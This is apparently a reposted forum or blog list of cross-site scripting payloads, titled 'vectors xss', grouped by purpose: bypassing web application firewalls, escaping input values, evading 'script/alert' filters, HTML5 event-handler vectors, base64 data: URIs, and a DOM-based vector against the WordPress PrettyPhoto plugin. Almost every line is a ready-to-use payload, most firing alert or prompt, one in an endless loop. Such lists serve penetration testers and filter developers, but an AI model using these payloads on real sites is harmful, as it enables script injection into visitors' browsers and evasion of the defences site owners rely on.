vectors xss

admin

1. /*These vectors will help to circumvent some of the limitations in the bypass WAF*/
   
2. /*All designs have been collected by me from different sources! special thanks to all the researchers xssposed archive*/
   
3.                                        
   
4. <svg><x><script>alert(1)</x>
   
5. <svg><x><script>alert('1')</x>
   
6. <svg onload=window.onerror=alert;throw/1/;//"/>
   
7. <img src=x onerror=while(true){prompt(1)}>
   
8. <iframe src=""/srcdoc='<svg onload=alert(1)>'>
   
9. <!--<img src="--><img src=x onerror=alert(1)//">
   
10. <svg id=javascript:alert(1) onload=location=id>
    
11. <svg id=alert(1) onload=eval(id)>
    
12. <img src=x:alert(alt) onerror=eval(src) alt=xwx>
    
13. <body/onpageshow=(alert)(1)>
    
14. <svg id=alert(1) onload=eval(id)>
    
15. <svg onload=(alert)(1) >
    
16. <frameset onload=alert(1)>
    
17.                                                       
    
18. /*To bypass input values*/
    
19. 
    
20. "autofocus/onfocus="alert (/1)
    
21. onfocus=onfocus=\u0061lert(1) autofocus
    
22. autofocus onfocus=window.onerror=alert;throw/1/;//
    
23. 
    
24.                                                       
    
25. 
    
26. /*Bypass filtration "script/alert"*/
    
27.                                           
    
28. <script>$=1,alert($)</script>
    
29. <script ~~~>confirm(1)</script ~~~>       
    
30. <script>$=1,\u0061lert($)</script>
    
31. <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
    
32. <</script/script><script ~~~>\u0061lert(1)</script ~~~>
    
33. </style></scRipt><scRipt>alert(1)</scRipt>
    
34.                                                       
    
35. /*tougher policy on the html tags*/
    
36.                                          
    
37. <h1 onmouseover=alert(1)>xwx
    
38. <h1/onmouseover='\u0061lert(1)'>xwx
    
39. <marquee/onstart=alert(1)>xwx
    
40. <div/onmouseover='alert(1)'>xwx
    
41. <h1/onmouseover='alert(1)'>xwx
    
42. <h1 onmouseover='alert(1)'>xwx
    
43. <p onmouseover='alert(1)'>xwx
    
44. <p/onmouseover='alert(1)'>xwx
    
45. <plaintext/onmouseover=prompt(1)>         
    
46.                                                                
    
47. /*Classic very popular vector*/
    
48.                                          
    
49. <script>alert(1)</script>
    
50. </script><img src=x onerror=alert(1);>
    
51. </script><iframe/onload=alert(1)>
    
52. <img src=x onerror=alert(1);>
    
53. <style ONLOAD=prompt(1)>
    
54. <iframe/onload=alert(1)>
    
55. <svg/onload=prompt(1)>
    
56. <svg onload=alert(1)>
    
57. 
    
58. "style=background:black; onmouseover=alert(1)"
    
59. "autofocus/onfocus="alert(1)
    
60. "onmouseover="alert(1);"
    
61. "/onmouseover= alert(1)>
    
62. "onload="alert(1)""
    
63.                                                         
    
64.                                                                                                                        
    
65. /*HTML5 popular vectors*/
    
66.                                          
    
67. <video/poster/onerror=alert(1)>
    
68. <video><source onerror="javascript:alert(1)">
    
69. <video onerror="javascript:alert(1)"><source>
    
70. <audio onerror="javascript:alert(1)"><source>
    
71. <input autofocus onfocus=alert(1)>
    
72. <select autofocus onfocus=alert(1)>
    
73. <textarea autofocus onfocus=alert(1)>
    
74. <keygen autofocus onfocus=alert(1)>
    
75. <form><button formaction="javascript:alert(1)">                 
    
76.                                          
    
77.                                          
    
78. /*data:text*/
    
79. data:text/plain,alert('xwx')
    
80. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
    
81. 
    
82. /*Bonus Dom Based Xss wector for popular WordPress plugin Prettyphoto*/
    
83.                                          
    
84. #!prettyPhoto/2,<a onclick="alert(1);">/                                /*firefox*/                         
    
85. #prettyPhoto[gallery]/1,<a onclick="alert(1);">/                  /*firefox*/
    
86. #prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/        /*firefox*/       
    
87.        
    
88. #prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)>               /*Only Google chrome*/
    
89. 
    
90. 
    
91.                                                       
    
92.   
    
93. 
    
94.                                                         

复制代码

https://set-cookie.ru/inject/vec.txt

没有详细解释，差评~~